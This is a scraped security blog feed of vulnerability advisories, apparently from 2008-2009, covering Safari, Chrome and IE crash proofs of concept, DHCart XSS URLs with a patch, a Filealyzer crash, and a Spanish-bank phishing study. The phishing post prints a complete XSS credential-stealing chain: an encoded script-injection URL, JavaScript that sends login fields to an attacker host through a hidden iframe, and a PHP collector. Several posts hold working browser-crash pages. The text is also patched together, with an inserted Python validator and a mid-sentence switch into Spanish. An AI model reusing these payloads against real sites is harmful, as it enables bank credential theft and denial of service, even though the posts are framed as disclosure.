<a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/Banesto.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/Banesto.GIF" height="250" width="400"></center></a><br />
<br />
###################<br />
banco santander:<br />
###################<br />
<br />
https://www.bancosantander.es<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/bancosantander.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/bancosantander.GIF" height="250" width="400"></center></a><br />
<br />
###########<br />
cajastur<br />
###########<br />
<br />
http://www.cajastur.es<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajasur.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajasur.GIF" height="250" width="400"></center></a><br />
<br />
<br />
################€nd###################<br />
<br />
--<br />
<br />
Sincerely:<br />
Lostmon (Lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>
Safari 3.2.1 for Windows SafariURL protocol handler abuse (null dereference) (published 2009-01-31)<br />
##############################################<br />
Safari 3.2.1 for Windows SafariURL protocol handler abuse (null dereference)<br />
Vendor: http://www.apple.com<br />
original advisory: http://lostmon.blogspot.com/2009/01/safari-321-for-windows-safariurl.html<br />
vendor notify: YES    Exploit available: Private<br />
##############################################<br />
<br />
This article is a "second" part of:<br />
http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html<br />
<br />
Safari for Windows is vulnerable to a null pointer dereference in the http, ftp and<br />
SafariURL protocol handlers.<br />
<br />
The issue is triggered when a user clicks a specially crafted link with a malformed URI<br />
that causes a NULL pointer dereference in Safari, resulting in loss of availability<br />
for the browser.<br />
<br />
The SafariURL case is very curious, because we can compose a malformed URL like<br />
SafariURL://../ or SafariURL://http://../ or ftp://../, and when we try to open it with<br />
Safari, Safari opens a new window; when we try to close this new one by clicking the<br />
'X', the window is closed but it opens again...<br />
<br />
So why does it open again, in an infinite loop?<br />
Take a look at the possible source code of the function: at no point, before using the<br />
pointer, does it check that it is not equal to NULL:<br />
<br />
######################<br />
Part of code affected<br />
######################<br />
<br />
CFURLRef safariURL = nil;<br />
OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator, CFSTR("com.apple.Safari"), nil, nil, &safariURL);<br />
if (err != noErr)<br />
    displayErrorAndQuit(@"Unable to locate Safari", @"Nightly builds of WebKit require Safari to run. Please check that it is available and then try again.");<br />
NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL path]];<br />
CFRelease(safariURL);<br />
return safariBundle;<br />
<br />
###############################<br />
<br />
Simple PoC<br />
<br />
<blockquote><br />
################################################<br />
#!/usr/bin/perl<br />
# Safari_httpDoSPoc.pl<br />
# Safari for Windows 3.2.1 Remote http: uri handler DoS<br />
# Lostmon [Lostmon@gmail.com ]<br />
#[http://lostmon.blogspot.com]<br />
use strict;<br />
use warnings;<br />
<br />
my $archivo = $ARGV[0];<br />
if(!defined($archivo))<br />
{<br />
 print "Usage: $0 <file.html>\n";<br />
 exit;   # stop here instead of trying to write to an undefined file name<br />
}<br />
<br />
# '@' is escaped so Perl does not interpolate it as an array name.<br />
my $cabecera = "<html><title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title><br />
<body>" . "\n";<br />
my $codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>(lostmon\@gmail.com) http://lostmon.blogspot.com</h3><br />
<P>This PoC is a malformed http, safariurl and ftp URI; it causes Safari for Windows<br><br />
to turn unstable and unresponsive.<br><br />
Click THIS link.=></p><a href=\"SafariURL://http://../\">Safari Die()</a> or this other =><a href=\"SafariURL://http://./\">Safari Die()</a><br />
<br><br />
=></p><a href=\"SafariURL://ftp://../\">Safari Die()</a> or this other =><a href=\"SafariURL://ftp://./\">Safari Die()</a><br />
";<br />
my $piepag = "</body></html>";<br />
<br />
my $datos = $cabecera . $codigo . $piepag;<br />
<br />
open(my $fh, '>', $archivo) or die "Cannot write $archivo: $!";<br />
print $fh $datos;<br />
close($fh);<br />
<br />
exit;<br />
<br />
############################################<br />
</blockquote><br />
<br />
I don't know if it has remote code execution or anything else; I made SEVERAL tests and<br />
could only cause a DoS. I don't know if we can change NSBundle...<br />
<br />
This issue with SafariURL can be exploited through other browsers: when the link is opened<br />
in another browser it executes safari.exe -url [link].<br />
<br />
Thanks to Estrella for being my light<br />
Thanks to all the Lostmon Team.<br />
<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>
Safari for Windows 3.2.1 Remote http: URI handler DoS (published 2009-01-27)<br />
A "malformed" http domain name can cause Safari to enter an infinite loop when it tries<br />
to resolve the domain, and at memory level it can cause an access violation when it tries<br />
to write to a section that contains unknown data.<br />
<br />
See the Safari_httpDoSPoc.pl file to demonstrate it!<br />
<br />
AppName: safari.exe AppVer: 3.525.27.1 ModName: safari.exe<br />
ModVer: 3.525.27.1 Offset: 00089394<br />
<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/safari_excepcion.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/safari_excepcion.GIF" height="250" width="400"></center></a><br />
<br />
<br />
<blockquote><br />
################################################<br />
#!/usr/bin/perl<br />
# Safari_httpDoSPoc.pl<br />
# Safari for Windows 3.2.1 Remote http: uri handler DoS<br />
# Lostmon [Lostmon@gmail.com ]<br />
#[http://lostmon.blogspot.com]<br />
use strict;<br />
use warnings;<br />
<br />
my $archivo = $ARGV[0];<br />
if(!defined($archivo))<br />
{<br />
 print "Usage: $0 <file.html>\n";<br />
 exit;   # stop here instead of trying to write to an undefined file name<br />
}<br />
<br />
# '@' is escaped so Perl does not interpolate it as an array name.<br />
my $cabecera = "<html><title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title><br />
<body>" . "\n";<br />
my $codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>(lostmon\@gmail.com) http://lostmon.blogspot.com</h3><br />
<P>This PoC is a malformed http URI; it causes Safari for Windows<br><br />
to turn unstable and unresponsive.<br><br />
Click THIS link.=></p><a href=\"http://../\">Safari Die()</a> or this other =><a href=\"http://./\">Safari Die()</a><br />
";<br />
my $piepag = "</body></html>";<br />
<br />
my $datos = $cabecera . $codigo . $piepag;<br />
<br />
open(my $fh, '>', $archivo) or die "Cannot write $archivo: $!";<br />
print $fh $datos;<br />
close($fh);<br />
<br />
exit;<br />
<br />
############################################<br />
</blockquote><br />
<br />
Thanks to Estrella for being my light<br />
Thanks to all who believe in me...<br />
<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
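Both Safari advisories above (the SafariURL null dereference and the http: handler DoS) are triggered by URLs such as http://../, http://./ or SafariURL://http://../, whose host part is not a host at all or which nest a second URL where the host should be. The checker below is an added example and not Apple's code: it is the gate a dispatcher should apply before resolving a name or launching a handler, rejecting unknown schemes, empty or dot-only hosts, empty labels and nested URLs. The allowed-scheme set is an assumption made for the example; the test inputs are the URLs quoted in the two advisories.

```python
"""Validate a URL before handing it to a protocol handler.

Added example for the two Safari 3.2.1 advisories; not Apple's code. It
rejects the malformed inputs those advisories use instead of letting a
handler dereference whatever the lookup of a non-host returned.
"""
from urllib.parse import urlsplit

# Constructed policy: schemes this dispatcher is willing to hand off.
ALLOWED_SCHEMES = {"http", "https", "ftp"}


def check_handler_url(url):
    """Return (ok, reason); ok is True only for a URL that is safe to dispatch."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    # SafariURL://... (or any custom scheme) is refused before anything else runs.
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme or '<none>'}"
    host = parts.hostname or ""
    if not host:
        return False, "empty host"
    # http://../ and http://./ yield a host made only of dots: neither a
    # DNS name nor an address, so resolving it is meaningless.
    if set(host) <= {"."}:
        return False, "host consists only of dots"
    if "" in host.split("."):
        return False, "empty label in host"
    # http://http://../ parses with host "http" and a path of "//../": a
    # nested URL in the host position means the outer URL was never valid.
    if parts.path.startswith("//") or "://" in parts.path:
        return False, "nested URL in path"
    return True, "ok"


if __name__ == "__main__":
    # Inputs quoted in the advisories plus one well-formed URL.
    for sample in ("http://www.example.com/index.html", "http://../", "http://./",
                   "SafariURL://http://../", "ftp://../", "http://http://../"):
        print(f"{sample:36s} -> {check_handler_url(sample)}")
```

The checks are ordered from cheapest to most specific so that the reason returned names the first thing a handler would have tripped over; logging that reason is also a usable detection signal, since legitimate pages do not link to dot-only hosts.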
</div>
Spanish banking facing phishing (published 2009-01-06)<br />
##########################################<br />
Spanish banking facing phishing<br />
##########################################<br />
<br />
After the recent increase in phishing cases against Spanish banking entities, I have<br />
carried out a small study on the state of those entities with regard to phishing.<br />
<br />
By phishing we mean the sending of fraudulent emails impersonating a banking entity, in<br />
which we are warned of some security failure or given other information and urged to visit<br />
a fake URL of the entity (they usually disguise the real address); once visited, we will<br />
most likely be asked for our login credentials, and if we enter them, those sites are<br />
usually set up to capture our access data.<br />
<br />
All of this is explained quite well here:<br />
<a href="http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx" target="_blank">http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx</a><br />
<br />
Once the concept of phishing is understood, we might think that you have to be very foolish<br />
to visit a website that is not the bank's original one and enter your credentials.<br />
<br />
Normally that is so, but what happens if the URL from which the phishing attack is carried<br />
out really is the bank's original one?<br />
<br />
In a quick look, eleven affected Spanish entities have been detected, both savings banks<br />
and banks.<br />
<br />
If you want to know whether your entity is affected, send me an email and we will gladly<br />
tell you whether you are on the list; if you are, the vulnerabilities found and their<br />
possible solution or mitigation would be reported to you.<br />
<br />
In any case, all the affected entities will receive an email informing them of this<br />
situation (some have already been sent one).<br />
<br />
But this is beating around the bush and not getting to the heart of the matter.. XDDDD<br />
<br />
So, if we take the case that most corporate websites of banking and financial entities are<br />
vulnerable to XSS or CSRF attacks (links to the wiki), this increases the possibility of<br />
carrying out phishing attacks on the bank's own website, making the deception more<br />
believable to unwary users.<br />
<br />
<br />
How can an attacker who has found a hole of that type carry out such an attack successfully?<br />
<br />
What follows is written as a sample or example; I am not responsible for the use that<br />
malicious users may make of it.<br />
<br />
This is rather presented as an example for administrators and webmasters, to explain how<br />
an attacker can carry out this type of attack on the website itself and thus make the<br />
deception more believable.<br />
 A server (probably compromised) to collect the data and host the files needed for the<br />
 phishing (JavaScripts).<br />
 Some SMTP server with open relay and no authentication, in case we want to use mail()<br />
 functions.<br />
<br />
On a bank's authentication page we normally find a form asking for the data needed to<br />
access account management and so on.<br />
<br />
An example form could look like this:<br />
<br />
====================<br />
<!-- Example login.php --><br />
====================<br />
 [..]<br />
 <form method="POST" action="login.php" name="loginusuarios"><br />
 User: <input type="text" name="usuari"><br /><br />
 Pass: <input type="password" name="pass"><br /><br />
 <input type="submit" name="submit" value="Login"><br />
 </form><br />
 [..]<br />
 <!-- EOF --><br />
<br />
If we look at the code we see several elements:<br />
<br />
 - There is a login form named "loginusuarios"<br />
 - The username text field will be "loginusuarios.usuari"<br />
 - The password field will be "loginusuarios.pass"<br />
<br />
Therefore, we could create a custom JavaScript for the site that adds a hidden iframe to<br />
the body of the document by means of XSS and thus obtains the data entered.<br />
<br />
<br />
An example could be this:<br />
<br />
<br />
http://[Entidad_victima]/login.php?variable_vulnerable=<br />
"><script src="http://[Attacker]/phishing.js"></script><br />
<br />
or in one of its encodings to disguise it even more:<br />
<br />
http://[Entidad Victima]/login.php?variable_vulnerable=%22%3E<br />
%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%<br />
5B%41%74%74%61%63%6B%65%72%5D%2F%70%68%69%73%68%69%6E%67%2E%<br />
6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E<br />
<br />
The JavaScript would run in the security context shared between the server and the<br />
browser of the website's legitimate user.<br />
<br />
====================<br />
/* phishing.js */<br />
====================<br />
<br />
 // Set the name of the form<br />
 Form = document.forms["loginusuarios"];<br />
<br />
 function OcultarLogin() {<br />
 // Create a new iframe.<br />
 var iframe = document.createElement("iframe");<br />
<br />
 // Force the iframe to be hidden<br />
 iframe.style.display = "none";<br />
<br />
 // Load the malicious code in the iframe.<br />
 iframe.src = "http://[atacante]/pilla_login.php?user="<br />
 + Form.usuari.value + "&pass=" + Form.pass.value;<br />
<br />
 // Append the iframe to the body of the document<br />
 document.body.appendChild(iframe);<br />
 }<br />
 // When the user clicks submit, that information is sent to us<br />
 // (assign the function itself, not the result of calling it).<br />
 Form.onsubmit = OcultarLogin;<br />
<br />
 /* EOF */<br />
==========================<br />
<br />
Then we need that data to be collected, and for that we need a server to send the requests<br />
to and a hosted file ready to receive them and save them or send them by email, as we prefer.<br />
<br />
====================<br />
/* pilla_login.php */<br />
====================<br />
<br />
<?php<br />
 $string = "";<br />
 if(isset($_GET['user']) && isset($_GET['pass'])) {<br />
 // Set the path and open the logins.txt file<br />
 $file_path = "logins.txt";<br />
 $file = @fopen($file_path, "a");<br />
 // build the string<br />
 $string = "User: ". $_GET['user'] ." and Pass: ". $_GET['pass'] . "\n";<br />
 // write the string and close the file.<br />
 @fwrite($file, $string);<br />
 @fclose($file);<br />
 }<br />
<br />
 // if we also want to send the captured data by mail =><br />
 // mail("atacante@atacante.es","Otro Pardillo pico","$string");<br />
?><br />
 /* EOF */<br />
=================================<br />
<br />
So a very simple hole such as an XSS can turn into a sophisticated attack for direct<br />
phishing against a banking entity.<br />
<br />
We could go even further:<br />
<br />
Supposing the victim user does not visit the page, or clicks somewhere else and goes to a<br />
page other than the one with the login form, we could "force" them to go to the login page<br />
first, so that before taking any action they must enter their login data in order to access.<br />
<br />
This would also be even more believable, since we would be carrying out the phishing<br />
directly from the entity's website and also forcing the user to log in with its own<br />
login form.<br />
<br />
If we modify the previous JavaScript to do the same but also force the user, we would<br />
create a second iframe: in one iframe we load the malicious code, and in the other we<br />
load the website's login form:<br />
<br />
=================================<br />
/* phishing2.js */<br />
<br />
 Form = document.forms["loginusuarios"];<br />
 function forzarLogin() {<br />
 var loginiframe = document.createElement("iframe");<br />
 loginiframe.src = "http://[Entidad-victima]/login.php";<br />
 document.body.appendChild(loginiframe);<br />
 }<br />
 function OcultarLogin() {<br />
 var iframe = document.createElement("iframe");<br />
 iframe.style.display = "none";<br />
 iframe.src = "http://[Atacante]/pilla_login.php?user="<br />
 + Form.usuari.value + "&pass=" + Form.pass.value;<br />
 document.body.appendChild(iframe);<br />
 }<br />
 window.onload = forzarLogin;<br />
 Form.onsubmit = OcultarLogin;<br />
<br />
 /* EOF */<br />
====================================<br />
<br />
Although everything presented here is a crude example, I think the scope is well reflected<br />
and the result is obvious, even though many online banking contracts have the user "sign"<br />
that they will not misuse the credentials supplied... etc.<br />
<br />
Faced with a real phishing attack... the victim user will not even have realised what<br />
happened, since it was they who legitimately entered their credentials on the entity's<br />
website, and it was from the entity's own website that those keys were stolen.<br />
<br />
Surely the webmasters and programmers of websites of this kind should pay more attention<br />
to this type of hole, which is not given much importance.<br />
<br />
Often they contract pre-designed services or systems such as one of the Oracle portals or<br />
some kind of CMS like Vignette CMS; but aren't the logical security teams that the entities<br />
have, or subcontract, responsible? Shouldn't those teams be up to date on vulnerabilities<br />
in their systems?<br />
<br />
The first measure in order to fight against the plague 
que <br />es el phishing deberia ser mantener nuestros sitios libres<br />de agujeros o al menos revisarlos y no sacar al mercado , <br />nada que no haya sido antees testeado a fondo, Pues es <br />nuestro dinero con el que en se juega.<br /><br />Despues de este estudio, dire, que me he quedado muy <br />decepcionado de lo que es la banca online española, <br />actualmente, son bastantes las entidades que podrian<br />estar afectadas.<br /><br />Los usuarios podrian prevenir estas situaciones usando por<br />ejemplo Internet explorer 8 que lleva un filtro antiXSS, <br />aunque personalmente me fio mas de la barra de netcraft, <br />ademas de que puede ser usada en explorer y en firefox<br /> <a href="http://toolbar.netcraft.com/" target="_blank">http://toolbar.netcraft.com/</a><br /><br />###############################<br />Enlaces Relacionados y fuentes:<br />###############################<br /><br /><a href="http://www.siliconnews.es/es/news/2008/09/22/bancos_espanoles_victimas_5_phishing_mundial" target="_blank">http://www.siliconnews.es/es/news/2008/09/22/bancos_espanoles_victimas_5_phishing_mundial</a><br /><a href="http://www.antiphishing.org/" target="_blank">http://www.antiphishing.org</a><br /><a href="http://www.playhack.net/papers/" target="_blank">http://www.playhack.net/papers/</a><br /><a href="http://www.microsoft.com/spain/empresas/legal/phishing.mspx" target="_blank">http://www.microsoft.com/spain/empresas/legal/phishing.mspx</a><br /><a href="http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx" target="_blank">http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx</a><br /><a href="http://seguridad.internautas.org/html/4428.html" target="_blank">http://seguridad.internautas.org/html/4428.html</a><br /><br />--<br /><br />atentamente:<br />Lostmon (Lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group:http://groups.google.com/group/lostmon (new)<br />--<br /><br />La curiosidad es lo que hace 
mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-39482065307931585322008-11-10T10:53:00.002-08:002008-11-10T11:06:11.124-08:00CaixaPenedes patches its online banking#######################################<br />CaixaPenedes patches its online banking<br />Vendor: http://www.caixapenedes.com<br />Original article: http://lostmon.blogspot.com/<br />2008/11/caixapenedes-pachea-su-banca-online.html<br />#######################################<br /><br />The CaixaPenedes website, under its various domains, was affected by a series of validation errors of the Cross-site scripting type.<br /><br />The vulnerabilities were reported in two phases:<br /><br />In the first phase, what was considered the most serious issue was reported: the ability to carry out transactions such as transfers without needing the key card; even when the card had not been activated, the bug still worked.<br /><br />This vulnerability was discovered by FalconDeOro and studied by him and by me until we found out how and where it worked.<br /><br />In the second phase I located some twenty vulnerabilities or attack vectors in the external part of the site, that is, the unauthenticated part, but served over the secure protocol https.<br /><br />The vulnerabilities were of the Cross-Site Scripting (XSS) type. These holes were reported to the CaixaPenedes logical security team and to the customer service department, by telephone and by e-mail respectively.<br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/caixapenedes.jpg" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/caixapenedes.jpg" height="250" width="400"></center></a><br /><br />-- <br /><br />Discovered in July 2008<br />Initial contact on 13 August 2008<br />Approximately fully patched on 20 September 2008<br />Made public on 10 November 2008<br /><br />For the first bug I cannot say exactly when it was discovered and when it was reported, since everything was done by telephone and I have no reference date, but it was before the second set. A combination of both could have been exploited by phishers, although during the time these security issues may have lasted no user/customer could have been affected, since everything was reported with the greatest possible discretion by both parties.<br /><br />No proof of concept is given, for obvious reasons.<br /><br />One XSS hole still remains, but I think that almost three months should have been enough time for it to be patched.<br /><br />########################### €nd ################################<br /><br />Thnx to estrella to be my light<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br />-- <br />Regards:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-21543479711880296522008-11-04T14:25:00.004-08:002009-03-28T03:10:48.539-07:00DHCart Multiple variable XSS and stored XSS###########################################<br />DHCart Multiple variable XSS and stored XSS<br />Vendor URL: http://www.dhcart.com/<br />Advisory: http://lostmon.blogspot.com/<br />2008/11/dhcart-multiple-variable-xss-and-stored.html<br />Vendor notify: YES  Exploit: YES  Patch: YES<br />###########################################<br /><br />DHCart is a PHP based application that provides a simple to use shopping cart for users purchasing domain names and hosting services.<br /><br />DHCart is prone to Cross-site scripting and stored Cross-site scripting.<br /><br />################<br />Solution<br />###############<br /><br />The vendor has reported that the latest version of DHCart is 3.86 and that there are no security bugs after v3.85.<br /><br />#############<br />See this PoC<br /><br />http://Victim/order.php?dhaction=check&submit_domain=Register&domain=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&ext1=on<br /><br />or<br /><br />http://Victim/order.php?dhaction=add&d1=lalalalasss%22%3E%3Cscript%3Ealert(1)%3C/script%3E&x1=.com&r1=0&h1=1&addtocart1=on&n=3<br /><br />In this case the XSS is exploitable via URL, and it is stored in the cart: when the user goes to look at their cart the XSS is executed again (stored XSS).<br /><br />Vulnerable code:<br /><br />Around line 93 in the config.php file we find:<br /><br />if (!empty($HTTP_GET_VARS)) while(list($name, $value) = each($HTTP_GET_VARS)) $$name = $value;<br /><br />This is vulnerable because $value is returned to the users without being sanitized.<br /><br />I have fully patched it: add a function to filter variables and apply this filter to the $value variable.<br /><br /><br />///////////////////////////////////////////////////////////////////////////<br />// Code below this point should not need modifying. Do so at your own risk! <br />///////////////////////////////////////////////////////////////////////////<br />function StopXSS($text)<br />{<br /> // Scalar value: drop empty parentheses, HTML tags and quote/angle/backslash characters<br /> if(!is_array($text))<br /> {<br /> $text = preg_replace("/\(\)/si", "", $text);<br /> $text = strip_tags($text);<br /> $text = str_replace(array("'","\"",">","<","\\"), "", $text);<br /> }<br /> else<br /> {<br /> // Array value: apply the same filter to every element<br /> foreach($text as $k=>$t)<br /> {<br /> $t = preg_replace("/\(\)/si", "", $t);<br /> $t = strip_tags($t);<br /> $t = str_replace(array("'","\"",">","<","\\"), "", $t);<br /> $text[$k] = $t;<br /> }<br /> }<br /> return $text;<br />}<br /><br />if (!empty($HTTP_GET_VARS)) while(list($name, $value) = each($HTTP_GET_VARS)) $$name = StopXSS($value);<br /><br />######################€nd##################<br />--<br />Thnx to estrella to be my light<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br />Thnx To Climbo<br /><br /><br />--<br />Regards:<br />Lostmon (lostmon@gmail.com)<br /><br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-5541952848029060622008-11-02T08:32:00.021-08:002008-11-02T09:45:27.880-08:00Multiple Browsers Stack overflow in javascript with infinite array##################################################<br />Multiple Browsers Stack overflow in javascript with infinite array<br />##################################################<br /> ############<br /> Description<br /> ############<br /><br />Multiple browsers are prone to a stack overflow or crash via an infinite array in the JavaScript engine.<br />This is extended research from this vulnerability/exploit:<br />http://www.securityfocus.com/bid/31703<br /><br />This issue can be used, for example, in a web post vulnerable to XSS-style attacks or similar, to carry out a DoS from the web against the victims' browsers.<br /><br />################<br />Browsers Tested:<br />################<br /><br />Fail = affected<br />Pass = not affected<br /><br />#####################<br /> Testing<br />#####################<br /><b>.:[-Multiple Browsers infinite array PoC By Lostmon -]:.</b><br />Here you have two variants of this array; save this file:<br />#####################################<br /><html><br /> <head><br /> <title>.:[-Multiple Browsers infinite array PoC By Lostmon -]:.</title><br /> <script type="text/javascript"><br /> function infinite_array()<br /> {<br /> foo = new Array();<br /> alert('infinite array');<br /> while(true) {foo = new Array(foo);}<br /> }<br /> function infinite_array2()<br /> {<br /> foo = new Array();<br /> alert('Infinite array with sort()');<br /> while(true) {foo = new Array(foo).sort();}<br /> }<br /> </script><br /> </head><br /> <body><br /><h3>.:[-Multiple Browsers infinite array PoC By Lostmon -]:.</h3><br /><input type="button" value="Infinite array Without sort()" onclick="infinite_array();" /><br /><input type="button" value="Infinite array with sort()" onclick="infinite_array2();" /><br /></body></html><br />####################################<br /> <a href="http://usuarios.lycos.es/reyfuss/xss/images/tabla.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/tabla.GIF"></center></a><br />###############<br />Stack Overflow<br />###############<br /><br />In IE7, Avant Browser and Maxthon this causes a stack overflow in JavaScript.<br /><br />In IE7 I tried to trace and exploit it with OllyDbg, but in every case I tested to make it executable, execution always ends up in the SEH. This is not exploitable, and when the user clicks OK in the alert the browser can continue working without problems, so this is a recoverable issue. The Microsoft security team has determined that this issue is not exploitable at this moment.<br /><br />In Google Chrome it can cause a tab crash, or, if we only have one window and one tab open, opening the exploit and, without waiting, trying to navigate to Google or another site makes Google Chrome close without any warning, error or alert; if we have multiple tabs open, this issue only crashes/closes the tab affected by the exploit. If we open the exploit and wait a few seconds, Chrome shows a warning to close the crashed tab.<br /><br /><br />################<br /> Memory abuse<br />################<br /><br />In IE7 it can cause memory abuse and make the whole system and all applications unstable (it can fill all the memory).<br /><br />In Safari for Windows it can cause program termination: Safari closes all windows and all tabs without an alert, warning or error. With Olly it can be traced, and it is a stack overflow as well.<br /><br />Some other browsers detect the slow script and ask whether to stop it.<br />In Opera it abuses memory, but we can recover it or navigate to other sites, so this is a recoverable issue.<br /> <br />#######################€nd#####################<br /><br />Thnx to Microsoft security team for support & interest.<br />Thnx to Apple security team for support & interest.<br />--<br />Thnx to estrella to be my light<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com</p><br />--<br />Regards:<br />Lostmon (lostmon@gmail.com)<br /><br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-52228816193600084332008-09-29T12:13:00.002-07:002008-09-29T12:29:33.296-07:00Safari for Windows and Google Chrome Window.open and alert DoS#####################################<br />Safari for Windows and Google Chrome<br /> Window.open & alert DoS<br />#####################################<br /><br />Reported here => http://code.google.com/p/chromium/issues/detail?id=2966<br /><br />Product Version : 0.2.149.30 (2200)<br />URLs (if applicable) :<br />Other browsers tested:<br />Add OK or FAIL after other browsers where you have tested this issue:<br /> Safari 3: FAIL<br /> Firefox 3: OK<br /> IE 7: OK<br /><br />What steps will reproduce the problem?<br />1. Open a malicious page with evil script code<br /><br />What is the expected result?<br />Chrome opens one window and shows one alert.<br /><br /><br />What happens instead?<br />Chrome opens a new window every time the user clicks OK in the alert...<br /><br />Please provide any additional information below. Attach a screenshot if possible.<br /><br />##########################<br />Evil Page with Javascript <br />##########################<br /><html><br /><head><br /><title> Chrome Window.open & alert DoS</title><br /></head><br /><body><br /><script><br />DMK = window.open(location.reload('http://lostmon.blogspot.com'));<br />DMK.alert(DMK)<br /></script><br /></body><br /></html><br /><br /><br />##################€nd##############<br />--<br />Thnx to estrella to be my light<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />-- <br />Regards:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-44439371716320320212008-09-28T12:08:00.002-07:002008-09-28T12:23:41.850-07:00Filealyzer 1.6.0.4 Stack overflow#################################<br />Filealyzer 1.6.0.4 Stack overflow<br />Vendor url: http://www.safer-networking.org/<br />Advisory: http://lostmon.blogspot.com/<br />2008/09/filealyzer-1604-stak-overflow.html<br />Vendor notify: yes  exploit: PRIVATE<br />###############################<br /><br /><br />#############################<br />Overview by vendor<br />#############################<br /><br />http://www.safer-networking.org/en/filealyzer/index.html<br /><br />FileAlyzer is a tool to analyze files - the name itself was initially just a typo of FileAnalyzer, but after a few days I decided to keep it. FileAlyzer allows a basic analysis of files (showing file properties and file contents in hex dump form) and is able to interpret common file contents like resources structures (like text, graphics, HTML, media and PE).<br /><br />Using FileAlyzer is as simple as viewing the regular properties of a file - just right-click the file you want to analyze and choose Open in FileAlyzer.<br /><br />###################<br />Description of bug<br />###################<br /><br />http://forums.spybot.info/showthread.php?t=34737<br /><br />Filealyzer is vulnerable to a stack overflow when parsing a malformed exe file with malformed version information.<br /><br />The asm code reveals that the application fails on an instruction when it tries to move the EAX register value into the EAX register again.<br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/filealyzer_crash.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/filealyzer_crash.GIF" height="250" width="400"></center></a><br /><br /><br /><br />#######################<br />Signature for identification<br />#######################<br /><br />This information is for IDS, antivirus or antispyware software, to ease detection.<br /><br />filesize=327168<br />timestamp[file]=2008-08-26 14:24:23<br />md5=B84ADA93FAEB728F024687A6127B5AAB<br />crc32=4629A2C8<br />exists[authx509]=0<br /><br />######################<br />Solution<br />###################<br /><br />No solution at this time !!!<br /><br />##############<br />Time Line<br />##############<br /><br />Discovered: 02-07-2008<br />Vendor notify: 28-09-2008<br />Disclosure: 28-09-2008<br /><br />##################€nd##############<br />--<br />Thnx to estrella to be my light<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br /><br />-- <br />Regards:<br />Lostmon (lostmon@gmail.com)<br 